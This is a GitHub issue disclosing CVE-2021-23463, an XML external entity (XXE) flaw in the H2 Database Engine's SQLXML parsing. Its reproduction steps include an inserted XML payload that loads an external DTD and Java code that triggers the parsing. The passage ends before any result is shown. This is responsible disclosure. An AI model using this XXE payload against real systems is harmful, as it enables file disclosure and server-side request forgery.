CVE-2021-23463: Report a H2-Database-Engine SQLXML XXE vulnerability · Issue #3195 · h2database/h2database

Hello, I am threedr3am of SecCoder Security Lab ([email protected]).

We found a security vulnerability(SCSL-2021-1001) in the H2-Database-Engine jar when using this component to connect to the h2 database , The returned data content field is parsed through SQLXML, which will cause the client XXE (https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing).

• Oracle mysql jdbc also recently fixed a similar security vulnerability, please refer to: https://nvd.nist.gov/vuln/detail/CVE-2021-2471
• This is their fix commit: mysql/mysql-connector-j@4993d57

vulnerability detail:

When analyzing the data returned by the database, the org.h2.jdbc.JdbcResultSet class provides the getSQLXML(java.lang.String) method, which parses the string data into an object of the org.h2.jdbc.JdbcSQLXML class.

When the object executes the getSource(Class sourceClass) method, if the input parameter is DOMSource.class, it will result in unprotected parsing of XML, resulting in XXE.

vulnerability reproduction:

1. The table exists in the database

   create table tb_test ( id bigint(20) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键id’, message text COMMENT 'SQLXML’, PRIMARY KEY (id) );

2. There is data in the tb_test table

   insert into tb_test(message) values(‘<?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY % remote SYSTEM "http://127.0.0.1:80/xxe.dtd"> %remote; ]>’);

3. Query the database to return the message field and parse it through SQLXML

   Statement statement = connection.createStatement(); statement.execute(“select * from tb_test”); ResultSet resultSet = statement.getResultSet(); while (resultSet.next()) { SQLXML sqlxml = resultSet.getSQLXML(“message”); sqlxml.getSource(DOMSource.class); }

4. result